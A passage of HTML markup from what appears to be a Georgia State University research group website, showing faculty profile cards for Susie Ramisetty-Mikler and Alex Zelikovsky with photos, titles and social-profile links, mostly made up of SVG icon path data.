17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c22-outer\">\n            <div data-colibri-id=\"182-c22\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c22 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c23\" class=\"d-block style-982 style-local-182-c23 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-SRM-360x360-1-e1697202435329.png\" class=\"wp-image-1704 style-982-image style-local-182-c23-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-982-frameImage style-local-182-c23-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c24\" class=\"h-global-transition-all h-heading style-974 style-local-182-c24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c24\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Susie Ramisetty-Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c25\" class=\"h-text h-text-component style-975 style-local-182-c25 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Research Associate Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c26\" class=\"h-text h-text-component style-976 style-local-182-c26 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Population Health Sciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c27\" class=\"style-983 style-local-182-c27 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/susie-ramisetty-mikler-7a0b3014/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://publichealth.gsu.edu/profile/susie-ramisetty-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=KzNVJwIAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c28-outer\">\n            <div data-colibri-id=\"182-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c29\" class=\"d-block style-973 style-local-182-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-zelikovsky.jpeg\" class=\"wp-image-704 style-973-image style-local-182-c29-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c29-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c30\" class=\"h-global-transition-all h-heading style-974 style-local-182-c30 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c30\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Zelikovsky</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c31\" class=\"h-text h-text-component style-975 style-local-182-c31 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Distinguished University Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c32\" class=\"h-text h-text-component style-976 style-local-182-c32 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c33\" class=\"style-977 style-local-182-c33 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/alex-zelikovsky-48a2795/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/alex-zelikovsky/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=UzCRNJwAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c34-outer\">\n            <div data-colibri-id=\"182-c34\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c35\" class=\"d-block style-973 style-local-182-c35 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-bourgeois.jpeg\" class=\"wp-image-696 style-973-image style-local-182-c35-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c35-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c36\" class=\"h-global-transition-all h-heading style-974 style-local-182-c36 position-relative h-element\">\n                  <!---->\n           